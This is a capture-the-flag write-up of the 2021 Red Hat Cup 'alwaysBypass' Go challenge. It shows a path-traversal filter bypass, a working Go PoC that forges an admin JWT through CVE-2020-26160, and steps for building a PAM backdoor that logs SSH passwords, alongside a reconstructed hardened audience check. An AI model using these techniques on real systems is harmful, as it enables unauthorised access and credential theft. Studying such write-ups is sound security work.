
2021 红帽 (Red Hat Cup) Offline Web Write-up

I could not attend because of the Nanjing COVID outbreak, so I asked cop for the Web challenges and reproduced them afterwards.

alwaysBypass

A Go challenge. Reading the source, the images route has an arbitrary file read; the filter is bypassed with URL encoding and a doubled "../" (e.g. "....//"), because the filter is applied once and not recursively.

    r.GET("/images", func(c *gin.Context) {
        // The check runs on the raw request URI, so a URL-encoded "../" is not caught.
        if strings.Contains(c.Request.RequestURI, "../") {
            c.String(http.StatusOK, "Illegal input")
        } else {
            images := c.DefaultQuery("file", "images.jpeg")
            // Single, non-recursive replacement: "....//" collapses back into "../".
            images = strings.ReplaceAll(images, "../", "")
            fpath := filepath.Join("images", images)
            if stat, err := os.Stat(fpath); err == nil && stat.Size() < 13448304 {
                c.File(filepath.Join("images", images))
            }
        }
    })


This gives us the SECRET_KEY (in the environment I set up myself I left it unchanged).

To reach exec we have to pass the user.TokenIsAdmin check:

    func TokenIsAdmin(ss string) (bool, error) {
        token, err := jwt.ParseWithClaims(ss, &MyCustomClaims{}, func(token *jwt.Token) (interface{}, error) {
            return Secret, nil
        })
        if err != nil {
            return false, err
        }
        if claims, ok := token.Claims.(*MyCustomClaims); ok && token.Valid {
            // Only an aud that is an empty *string* is rejected here; an array aud
            // fails the .(string) assertion and so is not caught by this check.
            if aud, ok := claims.MapClaims["aud"].(string); ok && aud == "" {
                return false, nil
            }
            // required=false: jwt-go < 4.0 treats a non-string aud as "" and returns true.
            if claims.ID != 10086 && claims.VerifyAudience(AdminKey, false) {
                return true, nil
            }
        }
        return false, nil
    }

I found this: https://snyk.io/blog/golang-security-access-restriction-bypass-vulnerability-jwt/

That is CVE-2020-26160: in jwt-go below 4.0, an aud of []string{""} bypasses the audience verification.

PoC:

    package main

    import (
        "fmt"

        "alwaysBypass/user"
        "github.com/dgrijalva/jwt-go"
    )

    type MyCustomClaims struct {
        ID int `json:"id"`
        jwt.MapClaims
    }

    func main() {
        claims := MyCustomClaims{
            123123, // any ID other than 10086
            jwt.MapClaims{
                "aud": []string{""}, // an array, not a string: passes the .(string) check and VerifyAudience
            },
        }
        // Sign with the SECRET_KEY recovered through the file read.
        token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
        ss, err := token.SignedString(user.Secret)
        if err != nil {
            panic(err)
        }
        fmt.Println(ss)
    }
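As an added illustration (not code from the write-up or from jwt-go itself), the stand-alone Go program below reconstructs the pre-4.0 audience check from the CVE description next to a hardened version, and runs the write-up's aud-as-array claim through both. The function names VerifyAudienceV3 and VerifyAudienceFixed and the value "admin-key" are assumptions made for this example.

```go
package main

import "crypto/subtle"
import "fmt"

// MapClaims mirrors jwt-go's claims map after JSON decoding: a JSON array
// arrives as []interface{}, never as a string.
type MapClaims map[string]interface{}

// VerifyAudienceV3 reconstructs the pre-v4 jwt-go audience check (CVE-2020-26160):
// a non-string "aud" fails the type assertion, aud becomes "", and with
// required=false the check passes without comparing anything.
func VerifyAudienceV3(m MapClaims, cmp string, required bool) bool {
	aud, _ := m["aud"].(string)
	if aud == "" {
		return !required
	}
	return subtle.ConstantTimeCompare([]byte(aud), []byte(cmp)) == 1
}

// VerifyAudienceFixed accepts both JSON shapes of "aud" (string or array of
// strings), always requires a match, and rejects empty or malformed values.
func VerifyAudienceFixed(m MapClaims, cmp string) bool {
	var auds []string
	switch v := m["aud"].(type) {
	case string:
		auds = []string{v}
	case []interface{}:
		for _, a := range v {
			if s, ok := a.(string); ok {
				auds = append(auds, s)
			}
		}
	default:
		return false // absent or unexpected type
	}
	for _, a := range auds {
		if a != "" && subtle.ConstantTimeCompare([]byte(a), []byte(cmp)) == 1 {
			return true
		}
	}
	return false
}

func main() {
	// Constructed claims matching the write-up's PoC: "aud" decoded from `[""]`.
	c := MapClaims{"id": 123123, "aud": []interface{}{""}}
	fmt.Println(VerifyAudienceV3(c, "admin-key", false), VerifyAudienceFixed(c, "admin-key"))
}
```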


Replace the Cookie with this token.

Command execution succeeds.

Because every command is executed by logging in over SSH with the user's password,

a PAM backdoor is used to capture the root password.


Download the matching PAM source from http://www.linux-pam.org/library/


Add the backdoor.

Compile:

./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr
make

The compiled module ends up in Linux-PAM-1.3.0/modules/pam_unix/.libs

Problems hit along the way and the fixes:

  • apt install autoconf
  • autoreconf -vfi
  • apt install pkg-config libssl-dev ...


Run find / -name "pam_unix.so"


Locate the pam_unix.so file and replace it, then simply run a command and check /tmp/.sshlog.



Last update: 2021-08-06